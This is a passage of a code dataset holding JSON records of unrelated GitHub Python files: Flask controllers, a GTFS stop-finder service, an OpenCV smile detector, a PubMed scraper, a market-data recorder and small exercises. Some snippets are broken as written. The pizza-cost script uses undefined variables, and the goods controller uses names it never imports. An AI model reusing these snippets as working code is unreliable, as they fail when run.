short cut edit data save\n :return: json data\n\n 1.参数检查 && 格式化\n 2.用户数据检查 && 角色权限\n 3.快捷入口数据\n 3.1 新增\n 3.2 编辑\n \"\"\"\n # ================= 1 - parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_shortcut_save_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_shortcut_save_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n if k == 'select':\n if not isinstance(v, list): # select参数类型检查\n return Status(\n 213, 'failure', u'请求参数%s类型必须是List' % k, {}).json()\n if len(v) > 15: # select参数长度检查,最大设置15个\n return Status(\n 213, 'failure', u'超出设置上限,最多设置15个', {}).json()\n new_params[k] = ';'.join(v) # 格式化成字符串存储\n new_params['select_list'] = v\n else:\n new_params[k] = str(v).strip()\n\n rtx_id = new_params.get('rtx_id').strip() # 去空格\n # -------------------- 2 - check user and roles --------------------\n # get user by rtx\n user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n # user model is not exist\n if not user:\n return Status(\n 202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n # user model is deleted\n if user.is_del:\n return Status(\n 203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n # 判断是否管理员,如果是管理员是全部菜单权限\n # 多角色,if包含管理员,直接是管理员权限\n roles = str(user.role).split(';') if user.role else [] # 分割多角色\n is_admin = True if ADMIN in roles \\\n else False\n auth_list = list()\n if not is_admin:\n # get authority by role list\n # user is admin, not get role, all authority menu\n role_models = self.role_bo.get_models_by_engnames(roles)\n for _r in role_models:\n if not _r or not _r.authority: continue\n auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n auth_list = list(set(auth_list)) # 去重\n # >>>>>>>>> 加入一层角色权限判断,不在角色权限的去掉菜单ID\n new_select = list()\n for _mid in new_params.get('select_list'):\n if int(_mid) in auth_list:\n new_select.append(_mid)\n new_params['select'] = ';'.join(new_select)\n # -------------------- 3 - shortcut model --------------------\n \"\"\"\n 2种情况:\n - 新增\n - 更新\n \"\"\"\n shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n if not shortcut: # 新增\n new_shortcut_model = self.shortcut_bo.new_mode()\n new_shortcut_model.rtx_id = rtx_id\n new_shortcut_model.shortcut = new_params['select']\n new_shortcut_model.create_time = get_now()\n new_shortcut_model.is_del = False\n self.shortcut_bo.add_model(new_shortcut_model)\n else: # 更新\n setattr(shortcut, 'shortcut', new_params['select'])\n setattr(shortcut, 'update_rtx', rtx_id)\n setattr(shortcut, 'update_time', get_now())\n self.shortcut_bo.merge_model(shortcut)\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), {}\n ).json()\n","repo_name":"GIS90/open2lisapi","sub_path":"deploy/services/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":32991,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"14209673412","text":"#What is the value of the first triangle number to have over\n# five hundred divisors?\n\n#important note is that the nth triangle number can be representent by n*(n+1)/2\n\nimport math;\nfrom time import time;\n\ndef divisors(n):\n num_factors = 0;\n for i in range(1,int(math.ceil(n**.5))+1):\n if n%i == 0:\n num_factors += 2;\n # if it is a perfect square then subtract one factor\n if i*i == n:\n num_factors -= 1;\n return num_factors;\n\ncnt = 0;\nn = 1;\nt = time();\n\nwhile cnt < 500:\n Tn = (n*(n+1))/2;\n if n%2 == 0:\n cnt = divisors(n/2)*divisors(n+1);\n else:\n cnt = divisors(n)*divisors((n+1)/2);\n n += 1;\n\ntt = time() - t;\nprint(Tn);\nprint(tt);","repo_name":"jnchristensen/python","sub_path":"12. Take 2.py","file_name":"12. Take 2.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17511885133","text":"from gtfs.parser.gtfs_reader import GTFS\nfrom gtfs.parser.route_stories import load_route_stories_from_csv\nfrom gtfs.bus2train.utilities import load_train_station_distance, routes_calling_at_stop, route_frequency\nfrom collections import defaultdict\n\nimport falcon\nfrom wsgiref import simple_server\n\nfrom sklearn.neighbors import KDTree\nimport numpy as np\nimport os\nimport json\nfrom datetime import date\nimport sys\n\ngtfs_folder = 'data/gtfs/gtfs_2016_05_25/' if len(sys.argv) == 1 else sys.argv[1]\nstart_date = date(2016, 6, 1)\n\n\nclass IndexServer:\n def __init__(self):\n self.content = open(os.path.join(os.path.dirname(__file__), 'stops.html'), encoding='utf8').read()\n\n def on_get(self, req, resp):\n self.content = open(os.path.join(os.path.dirname(__file__), 'stops.html'), encoding='utf8').read()\n resp.body = self.content\n resp.set_header('Content-Type', 'text/html')\n\n\nclass StopFinder:\n def __init__(self, gtfs_folder):\n self.gtfs = GTFS(os.path.join(gtfs_folder, 'israel-public-transportation.zip'))\n self.gtfs.load_stops()\n self.gtfs.load_routes()\n\n print(\"Loading tree\")\n stop_locations = np.matrix([(s.stop_lat, s.stop_lon) for s in self.gtfs.stops.values()])\n self.stops = [s for s in self.gtfs.stops.values()]\n self.tree = KDTree(stop_locations)\n print(\"Tree loaded\")\n\n print(\"Loading station distance\")\n self.station_distance = load_train_station_distance(gtfs_folder)\n print(\"Station distance loaded\")\n\n print(\"Loading route stories\")\n route_stories, trip_to_stories = load_route_stories_from_csv(os.path.join(gtfs_folder, 'route_stories.txt'),\n os.path.join(gtfs_folder,\n 'trip_to_stories.txt'))\n print(\"Route stories loaded\")\n\n print(\"Loading routes calling at stops\")\n route_freq = route_frequency(self.gtfs, start_date)\n self.routes_calling_at_stop = defaultdict(lambda: [])\n for stop_id, routes in routes_calling_at_stop(self.gtfs, trip_to_stories, start_date).items():\n self.routes_calling_at_stop[stop_id] = [(route, *route_freq[route]) for route in routes]\n print(\"Calling at stops loaded\")\n print(\"Ready.\")\n\n def find(self, lat, lng):\n d, p = self.tree.query(np.matrix((lat, lng)), k=1, return_distance=True) # d[0] is the distance\n return self.stops[p[0]]\n\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n lat = float(req.get_param('lat'))\n lng = float(req.get_param('lng'))\n print(\"Request received for (%s,%s)\" % (lat, lng))\n # find nearest bus stop to click location\n stop = self.find(lat, lng)\n # nearest train station to the bus stop\n nearest_train_station = self.station_distance[stop.stop_id]\n train_station_name = self.gtfs.stops[nearest_train_station.station_id].stop_name\n train_station_distance = nearest_train_station.distance\n # routes stopping at the bus stop\n routes = [{\n 'line_number': route_and_frequency[0].line_number,\n 'route_code': route_and_frequency[0].route_desc,\n 'weekday_calls': route_and_frequency[1],\n 'weekend_calls': route_and_frequency[2]\n } for route_and_frequency in self.routes_calling_at_stop[stop.stop_id]]\n\n resp.body = json.dumps({\n 'stop_id': stop.stop_id,\n 'stop_code': stop.stop_code,\n 'stop_name': stop.stop_name,\n 'stop_desc': stop.stop_desc,\n 'zone_id': stop.zone_id,\n 'lat': stop.stop_lat,\n 'lng': stop.stop_lon,\n 'is_train_station': train_station_distance == 0,\n 'train_station': train_station_name,\n 'train_station_distance': int(train_station_distance),\n 'routes': routes\n })\n\napp = falcon.API()\napp.add_route('/', IndexServer())\napp.add_route('/stop', StopFinder(gtfs_folder))\n\n# Useful for debugging problems in your API; works with pdb.set_trace(). You\n# can also use Gunicorn to host your app. Gunicorn can be configured to\n# auto-restart workers when it detects a code change, and it also works\n# with pdb.\nif __name__ == '__main__':\n httpd = simple_server.make_server('127.0.0.1', 8000, app)\n httpd.serve_forever()\n","repo_name":"bogind/open_bus","sub_path":"gtfs/web/stops_service.py","file_name":"stops_service.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3828172545","text":"import cv2\nimport numpy as np\n\n# Load the face and emotion classifiers\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nemotion_classifier = cv2.CascadeClassifier('haarcascade_smile.xml')\n\n# Set up the webcam feed\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Convert the frame to grayscale for face detection\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect the faces in the frame\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n # Draw rectangles around the detected faces\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Crop the face and convert it to grayscale for emotion detection\n roi_gray = gray[y:y + h, x:x + w]\n\n # Detect the smile in the face\n smiles = emotion_classifier.detectMultiScale(roi_gray, scaleFactor=1.5, minNeighbors=15, minSize=(25, 25))\n\n # Draw rectangles around the detected smiles\n for (sx, sy, sw, sh) in smiles:\n cv2.rectangle(frame, (x + sx, y + sy), (x + sx + sw, y + sy + sh), (0, 0, 255), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n # Exit the program when the user presses 'q'\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"malgorath/OscarAI","sub_path":"smile_detector.py","file_name":"smile_detector.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73806124638","text":"import math\nimport textdistance\nimport pandas as pd\n\n\ndef sort_2d_array_mark(array):\n \"\"\"\n # sort the imported excel file as 2d array according to marks of tasks\n :param array: a 2d array\n :return: a sorted 2d array, sort from left to right and also from top to bottom\n \"\"\"\n # header = array.pop(0)\n # sort rows\n for i in range(2, len(array)):\n for j in range(i, len(array)):\n count1 = 0\n count2 = 0\n for k in range(1, len(array[0])):\n count1 += int(array[i][k])\n count2 += int(array[j][k])\n if count1 < count2:\n array[j], array[i] = array[i], array[j]\n # sort columns\n for i in range(1, len(array[0]) - 1):\n for j in range(1, len(array[0]) - i):\n count1 = 0\n count2 = 0\n for k in range(2, len(array) - 1):\n count1 += int(array[k][j])\n count2 += int(array[k][j + 1])\n if count1 < count2:\n for k in range(len(array)):\n array[k][j], array[k][j + 1] = array[k][j + 1], array[k][j]\n\n\ndef break_down_marks(array, index):\n indexs = []\n\n for i in range(1, len(array[0])):\n count = 0\n for string in index[0]:\n if textdistance.hamming.normalized_similarity(string, str(array[0][i])) >= 0.5:\n count += 1\n indexs.append(count)\n\n transposed_array = transpose(array)\n\n max_mark = []\n for i in range(1, len(transposed_array)):\n # assume the maximum mark of this task is 1\n max_mark.append(int(max(transposed_array[i][2:])))\n\n for i in range(len(indexs)):\n if indexs[i] < max_mark[i]:\n raise Exception(\"the max mark of this task is greater than its total sub-criteria\")\n\n new_array = [index[1], index[0]]\n\n for row in range(1, len(array)):\n tmp = []\n for column in range(1, len(array[0])):\n for i in range(indexs[column - 1]):\n if array[row][column] > 0:\n tmp.append(1)\n array[row][column] -= 1\n else:\n tmp.append(0)\n array[row][column] -= 1\n # print(tmp)\n new_array.append(tmp)\n # new_array[1][0] = \"student_id\"\n new_array[0].insert(0, \"\")\n for i in range(len(array)):\n new_array[i + 1].insert(0, array[i][0])\n return new_array\n\n\ndef transpose(array):\n \"\"\"\n # transpose the array\n :param array: 2d array\n :return: transposed 2d array\n \"\"\"\n temp = [[0 for x in range(len(array))] for y in (range(len(array[0])))]\n for i in range(len(array)):\n for j in range(len(array[i])):\n temp[j][i] = array[i][j]\n return temp\n\n\ndef readfile(file_name):\n \"\"\"\n # read an excel file and store it in a 2d array\n :return: a 2d array containing all information from that excel file\n \"\"\"\n xls = pd.ExcelFile(file_name)\n sheet_names = xls.sheet_names\n\n if len(sheet_names) < 2:\n raise Exception('Excel file has less than 2 work sheets')\n\n df1 = pd.read_excel(xls, sheet_names[0])\n\n excel_dict1 = df1.to_dict(orient='dict')\n\n array1 = []\n # read the first worksheet\n for key in excel_dict1.keys():\n temp_array1 = []\n for index in excel_dict1[key]:\n temp_array1.append(excel_dict1[key][index])\n\n array1.append(temp_array1)\n for i in range(len(array1[0])):\n array1[0][i] = str(array1[0][i])\n\n fst_row_int_cnt, snd_row_int_cnt = 0, 0\n item_name = []\n for i in range(1, len(array1)):\n if isinstance(array1[i][0], (float, int)) and int(math.floor(array1[i][0])) == array1[i][0]:\n snd_row_int_cnt += 1\n item_name.append(array1[i][0])\n for j in range(1, len(array1[0])):\n if not isinstance(array1[i][j], (float, int)) or \\\n math.isnan(array1[i][j]) or array1[i][j] < 0 or \\\n int(math.floor(array1[i][j])) != array1[i][j]:\n raise Exception(\"Mark data should present starting from B3, non-integer or negative value detected.\")\n if snd_row_int_cnt == len(array1) - 1:\n raise Exception(\"Second row should be item names, digit value detected.\")\n if len(item_name) != len(set(item_name)):\n raise Exception(\"Duplicate item name detected.\")\n if len(array1[0][1:]) != len(set(array1[0][1:])):\n raise Exception(\"Duplicate student name detected.\")\n\n array2 = []\n\n df2 = pd.read_excel(xls, sheet_names[1])\n excel_dict2 = df2.to_dict(orient='dict')\n\n for key in excel_dict2.keys():\n temp_array2 = []\n for index in excel_dict2[key]:\n temp_array2.append(excel_dict2[key][index])\n array2.append(temp_array2)\n\n # exam if the criteria is listed in order\n previous = \"\"\n for i in range(len(array2[0])):\n if previous > array2[0][i]:\n raise Exception(\"the criteria in worksheet 2 is not listed in order\")\n previous = array2[0][i]\n return array1, array2\n","repo_name":"chengengliu/Guttman-Analysis-System-MasterProject","sub_path":"model/file_importing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"22203826093","text":"\"\"\"\nWrite a function fibonacci that:\nInput: (n: int) n is greater than 0 (guaranteed)\nOutput: return the number at index n in fibonacci sequence\n\"\"\"\n\n\ndef fibonacci(n: int):\n if n < 0:\n return None\n elif n == 0 or n == 1:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n","repo_name":"ntxtung/python-course","sub_path":"001_introduction_to_programming/015_fibonacci/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21904959096","text":"\"\"\"itch50_exec_trade_recorder.py: A trade recorder for ITCH 5.0\"\"\"\n\n__author__ = \"Charles Martineau\"\n__email__ = \"martineau.charles@gmail.com\"\n\nfrom meatpy.market_event_handler import MarketEventHandler\nfrom meatpy.itch50.itch50_market_message import *\nfrom meatpy.itch50.itch50_market_message import TradeMessage\n\n\n\nclass ITCH50ExecTradeRecorder(MarketEventHandler):\n def __init__(self):\n self.records = []\n\n def message_event(self, market_processor, timestamp, message):\n \"\"\"Detect messages that affect th top of the book and record them\"\"\"\n lob = market_processor.current_lob\n if isinstance(message, OrderExecutedMessage):\n # An executed order will ALWAYS be against top of book\n # because of price priority, so record.\n if lob.ask_order_on_book(message.orderRefNum):\n record = {\"MessageType\": \"Exec\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum}\n record[\"Queue\"] = \"Ask\"\n record[\"Price\"] = lob.ask_levels[0].price\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n\n self.records.append((timestamp, record))\n elif lob.bid_order_on_book(message.orderRefNum):\n record = {\"MessageType\": \"Exec\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum}\n record[\"Queue\"] = \"Bid\"\n record[\"Price\"] = lob.bid_levels[0].price\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n self.records.append((timestamp, record))\n elif isinstance(message, TradeMessage):\n if message.bsindicator == b'S':\n record = {\"MessageType\": \"ExecHid\", \"Volume\": message.shares, \"OrderID\": '', \"OrderTimestamp\": ''}\n record[\"Queue\"] = \"Ask\"\n record[\"Price\"] = message.price\n self.records.append((timestamp, record))\n elif message.bsindicator == b'B':\n record = {\"MessageType\": \"ExecHid\", \"Volume\": message.shares, \"OrderID\": '', \"OrderTimestamp\": ''}\n record[\"Queue\"] = \"Bid\"\n record[\"Price\"] = message.price\n self.records.append((timestamp, record))\n elif isinstance(message, OrderExecutedPriceMessage):\n if (len(lob.ask_levels) > 0 and\n lob.ask_levels[0].order_on_book(message.orderRefNum)):\n record = {\"MessageType\": \"ExecPrice\", \"Queue\": \"Ask\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum, \"Price\": message.price}\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n self.records.append((timestamp, record))\n elif (len(lob.bid_levels) > 0 and\n lob.bid_levels[0].order_on_book(message.orderRefNum)):\n record = {\"MessageType\": \"ExecPrice\", \"Queue\": \"Bid\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum, \"Price\": message.price}\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n self.records.append((timestamp, record))\n\n def write_csv(self, file):\n \"\"\"Write to a file in CSV format\"\"\"\n # Write header row\n file.write('Timestamp,MessageType,Queue,Price,Volume,OrderID,OrderTimestamp\\n'.encode())\n # Write content\n for x in self.records:\n row = (str(x[0]) + ',' + x[1][\"MessageType\"] + ',' +\n x[1][\"Queue\"] + ',' + str(x[1][\"Price\"]) + ',' +\n str(x[1][\"Volume\"]) + ',' + str(x[1][\"OrderID\"]) +\n ',' + str(x[1][\"OrderTimestamp\"]) + '\\n')\n file.write(row.encode())","repo_name":"vgreg/MeatPy","sub_path":"meatpy/itch50/itch50_exec_trade_recorder.py","file_name":"itch50_exec_trade_recorder.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"51"} +{"seq_id":"35657637898","text":"\"\"\"\nURL scraping de las publicaciones de PubMed. Dado un archivo con los diferentes PMID por línea,\nobtiene la URL de las fuentes y las guarda al lado de cada PMID.\n\"\"\"\n\nfrom utils import fetch_url, redirect, elsevier\nimport sys\n\ndef get_src_url(pmid):\n \"\"\"Dado un PMID, devuelve la URL de la fuente.\"\"\"\n BASE_PUBMED_URL = \"https://www.ncbi.nlm.nih.gov/pubmed/\"\n data = fetch_url(BASE_PUBMED_URL + pmid)\n return extract_src_url(data)\n\ndef extract_src_url(data):\n \"\"\"Extrae la URL de la fuente a partir del contenido de una página de PubMed.\"\"\"\n for l in data.split(\"\\n\"):\n try:\n found = l.index(\"Full Text Sources\")\n href = l.index(\"href=\", found)\n url = l[href+6:l.index('\"', href+7)].replace(\"&\", \"&\")\n return get_true_url(url)\n except:\n pass\n return \"No encontrado\"\n\ndef get_true_url(url):\n \"\"\"Para ciertas fuentes que en realidad son una redirección.\"\"\"\n if \"doi.org\" in url:\n print(\"Redirigiendo\", url)\n return redirect(url) or url\n elif \"linkinghub.elsevier.com\" in url:\n print(\"Redirigiendo\", url)\n return elsevier(url) or url\n else:\n return url\n\ndef test():\n \"\"\"Función para verificar funcionamiento.\"\"\"\n data = open(\"example.html\").read()\n assert \"https://linkinghub.elsevier.com/retrieve/pii/S0002-9149(99)00490-7\" == extract_src_url(data)\n\n\n\ndef process_line(l):\n if len(l.split()) > 1:\n pmid, url = l.split()[0], l.split()[1]\n if url != \"No\":\n return pmid + \" \" + get_true_url(url)\n else:\n return l\n else:\n url = get_src_url(l) # l == pmid\n print(l.strip(), url)\n return l.strip() + \" \" + url\n\n\nif __name__ == \"__main__2\":\n if len(sys.argv) == 2 and sys.argv[1] == \"-t\":\n test()\n exit()\n if len(sys.argv) != 3:\n print(\"Uso: {} entrada salida\".format(sys.argv[0]))\n exit()\n with open(sys.argv[2], \"w\") as out:\n with open(sys.argv[1]) as f:\n for l in f:\n if len(l.split()) > 1:\n pmid, url = l.split()[0], l.split()[1]\n if url != \"No\":\n out.write(pmid + \" \" + get_true_url(url) + \"\\n\")\n else:\n out.write(l)\n else:\n url = get_src_url(l) # l == pmid\n print(l.strip(), url)\n out.write(l.strip() + \" \" + url + \"\\n\")\n\n\nimport parallel\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Uso: {} entrada salida\".format(sys.argv[0]))\n exit()\n with open(sys.argv[1]) as f:\n parallel.parallel_map_to_file(process_line, f.readlines(), sys.argv[2])\n","repo_name":"johny65/PFC_DGIdb_src","sub_path":"scraping/base_pubmed.py","file_name":"base_pubmed.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16232989229","text":"#!/usr/bin/env python3\n# from dataclasses import dataclass\n#\n# from dataclasses_jsonschema import JsonSchemaMixin\n#\n#\n# @dataclass\n# class X(JsonSchemaMixin):\n# \"A 2D point\"\n# x: str\n# y: str\n#\n# print(X('ewe', 'wewe'))\n\ndata = {\n \"first_name\": \"Jonathan\",\n \"middle_name\": None,\n \"last_name\": \"Hsu\",\n \"family\": {\n \"mother\": \"Mary\",\n \"father\": \"Peter\",\n \"brother\": \"Charles\",\n \"sister\": None,\n \"eeee\": [],\n },\n \"tmp\": {\n \"a\": None,\n \"b\": None,\n },\n \"lol\": {\n \"jhund\": {\n \"sss\": None,\n \"uuu\": \"skdksnd\",\n },\n \"lll\": None,\n \"gggg\": [1,2,3,4,5]\n }\n}\n\nfrom typing import Dict\n\ndef clean_null_terms(input_dict: Dict):\n \"\"\"\n\n :param input_dict:\n :return:\n \"\"\"\n clean = {}\n for k, v in input_dict.items():\n if isinstance(v, Dict):\n # import pdb\n # pdb.set_trace()\n nested = clean_null_terms(v)\n if len(nested.keys()) > 0:\n clean[k] = nested\n elif isinstance(v, list):\n clean[k] = v\n elif v is not None:\n clean[k] = v\n return clean\n # print(clean)\n\nimport json\nprint(json.dumps(clean_null_terms(data), indent=4))\n","repo_name":"arknandan25/Python101","sub_path":"dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1528873572","text":"import pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nfrom plotly.offline import iplot, init_notebook_mode\n\n\ndef read_data(file):\n return pd.read_csv(file)\n\n\nfile = \"2010YumaAZ.csv\"\ndf = read_data(file)\n\n\ndef decribe_data(df):\n print(\"Sample \\n\", df.sample(50))\n print(\"\\n Decribe data \\n\", df.describe())\n print(\"\\n Columns \\n\", df.columns)\n print(\"Information\", df.info())\n\n\ndata = [go.Scatter(x=df['LST_TIME'],\n y=df[df['DAY'] == day]['T_HR_AVG'],\n mode='lines+markers',\n name=day)\n for day in df['DAY'].unique()]\n\nlayout = go.Layout(title='Daily Temperature line Chart',\n xaxis={'title': 'X axis'},\n yaxis={'title': 'y axis'})\n\nfig = go.Figure(data, layout)\n\niplot(fig)\n","repo_name":"Billy254/plotly-data-visualization-","sub_path":"line_chart_exercise.py","file_name":"line_chart_exercise.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26970998435","text":"# Atlantapizza.py\n\nnumber_of_pizza = eval(input(\"How many pizzas do you want?\"))\n\ncost_per_pizza = eval(input(\"how much does each pizza cost\"))\n\nSubtotal = number_of_pizzas * cost_per_pizza\n\ntaxe_rate = 0.08\n\nsales_tax = subtotal + sales_tax\n\nprint(\"the total cost is $\", total)\nprint(\"this includes $\",subtotal,\"for the pizza and\")\nprint(\"$\", sales_tax,\"in sales tax.\")\n","repo_name":"pratith-girish/python-course","sub_path":"chapter 3/Pizza.py","file_name":"Pizza.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"367191575","text":"from flask import Blueprint,request,redirect,jsonify\nfrom common.libs.Helper import ops_render,ipagenation,getcurrentdate\nfrom common.libs.UrlManager import UrlManager\nfrom common.models.goods.Goods import Goods\nfrom application import app,db\n\nrouter_goods = Blueprint('goods_page',__name__)\n\n@router_goods.route(\"/index/\")\ndef index():\n resp_data = {}\n query = Goods.query\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n if 'status' in req and int(req['status']) > -1:\n query = query.filter(Goods.status == int(req['status']))\n if 'mix_kw' in req:\n rule = or_(Goods.name.ilike('%{0}%'.format(req['mix_kw'])),Goods.tags.ilike('%{0}%'.format(req['mix_kw'])))\n query = query.filter(rule)\n if 'cat_id' in req and int(req['cat_id']) > 0:\n query = query.filter(Goods.cat_id == int(req['cat_id']))\n params={\n 'total':query.count(),\n 'page_size':5,\n 'page':page,\n 'url':request.full_path.replace('&p={}'.format(page),'')\n }\n pages = ipagenation(params)\n # 当前页数据开始位置\n offset = (page-1) * 5\n # 当前页数据结束为止\n limit = page * 5\n list = query.all()[offset:limit]\n resp_data['list'] = list\n resp_data['status'] = app.config['STATUS']\n resp_data['pages'] = pages\n return ops_render('/goods/index.html',resp_data)\n\n\n@router_goods.route(\"/info/\")\ndef info():\n resp_data = {}\n\n return ops_render('goods/info.html')\n\n\n@router_goods.route(\"/set/\",methods=['GET','POST'])\ndef set():\n if request.method == 'GET':\n resp_data = {}\n req = request.args\n id = int(req.get('id',0))\n info = Goods.query.filter_by(id=id).first()\n if info and info.status != 1:\n return redirect(UrlManager.buildUrl('/goods/index/'))\n resp_data['info'] = info\n return ops_render('goods/set.html',resp_data)\n resp = {\n 'code':200,\n 'msg':'操作成功!',\n 'data':{}\n }\n req = request.values\n id = int(req['id']) if 'id' in req and req['id'] else 0\n cat_id = int(req['cat_id']) if 'cat_id' in req else 0\n name = req['name'] if 'name' in req else ''\n price = req['price'] if 'price' in req else ''\n main_image = req['main_image'] if 'main_image' in req else ''\n summary = req['summary'] if 'summary' in req else ''\n stock = int(req['stock']) if 'stock' in req else ''\n tags = req['tags'] if 'tags' in req else ''\n\n if cat_id < 1:\n resp['code'] = -1\n resp['msg'] = '请选择分类'\n return jsonify(resp)\n if name is None or len(name) < 1:\n resp['code'] = -1\n resp['msg'] = '请输入符合规范的名称'\n return jsonify(resp)\n if not price or len(price) < 1:\n resp['code'] = -1\n resp['msg'] = '请输入符合规范的价格'\n return jsonify(resp)\n price = Decimal(price).quantize(Decimal('0.00'))\n if price < 0:\n resp['code'] = -1\n resp['msg'] = '请输入符合规范的价格'\n return jsonify(resp)\n if main_image is None or len(main_image) < 1:\n resp['code'] = -1\n resp['msg'] = '请上传封面'\n return jsonify(resp)\n if summary is None or len(summary) < 1:\n resp['code'] = -1\n resp['msg'] = '请输入商品描述,不少于10个字符'\n return jsonify(resp)\n if stock < 1:\n resp['code'] = -1\n resp['msg'] = '请输入符合规范的库存量'\n return jsonify(resp)\n if tags is None or len(tags) < 1:\n resp['code'] = -1\n resp['msg'] = '请输入标签,便于搜索'\n return jsonify(resp)\n goods_info = Goods.query.filter_by(uid=id).first()\n before_stock = 0\n if goods_info:\n model_goods = goods_info\n before_stock = model_goods.stock\n else:\n model_goods = Goods()\n model_goods.status = 1\n # 插入格式化的时间\n model_goods.created_time = getcurrentdate()\n model_goods.cat_id = cat_id\n model_goods.name = name\n model_goods.price = price\n model_goods.main_image = main_image\n model_goods.summary = summary\n model_goods.stock = stock\n model_goods.tags = tags\n model_goods.updated_time = getcurrentdate()\n \n db.session.add(model_goods)\n db.session.commit()\n\n return jsonify(resp)\n\n@router_goods.route(\"/cat/\")\ndef cat():\n resp_data = {}\n\n return ops_render('goods/cat.html')\n\n \n@router_goods.route(\"/cat_set/\")\ndef cat_set():\n resp_data = {}\n\n return ops_render('goods/cat_set.html')\n\n","repo_name":"wgf0210/hmsx","sub_path":"hmsx/web/controllers/goods/Goods.py","file_name":"Goods.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"26303324218","text":"import heapq\nimport time\n\nfrom horizons.util.python.singleton import ManualConstructionSingleton\n\n\nclass _ExtCallbackObject:\n\t\"\"\"Class used by the ExtScheduler Class to organize callbacks.\"\"\"\n\n\tdef __init__(self, callback, class_instance, run_in=1, loops=1):\n\t\t\"\"\"Creates the CallbackObject instance.\n\t\t@param callback: lambda function callback, which is called run_in ticks.\n\t\t@param class_instance: class instance the original function(not the lambda function!) belongs to.\n\t\t@param run_in: int number of ticks after which the callback is called. Standard is 1, run next tick.\n\t\t@param loops: How often the callback is called. -1 = infinite times. Standard is 1, run once.\n\t\t\"\"\"\n\t\tself.callback = callback\n\t\tself.class_instance = class_instance\n\t\tself.run_in = run_in\n\t\tself.loops = loops\n\n\tdef __str__(self):\n\t\treturn \"ExtSchedCb(%s on %s)\" % (self.callback, self.class_instance)\n\n\tdef __lt__(self, other):\n\t\t# make sure that there is always some ordering\n\t\tif self.run_in < other.run_in:\n\t\t\treturn True\n\t\treturn id(self) < id(other)\n\n\nclass ExtScheduler(object, metaclass=ManualConstructionSingleton):\n\t\"\"\"The ExtScheduler is used for time based events that are not part of the simulation(gui, menu, scrolling).\n\tTo start a timed callback, call add_new_object() to make the TimingThread Class create a CallbackObject for you.\n\t@param pump: pump list the scheduler registers itself with.\n\t\"\"\"\n\n\tNOOP = _ExtCallbackObject(lambda: 42 * 1337 - 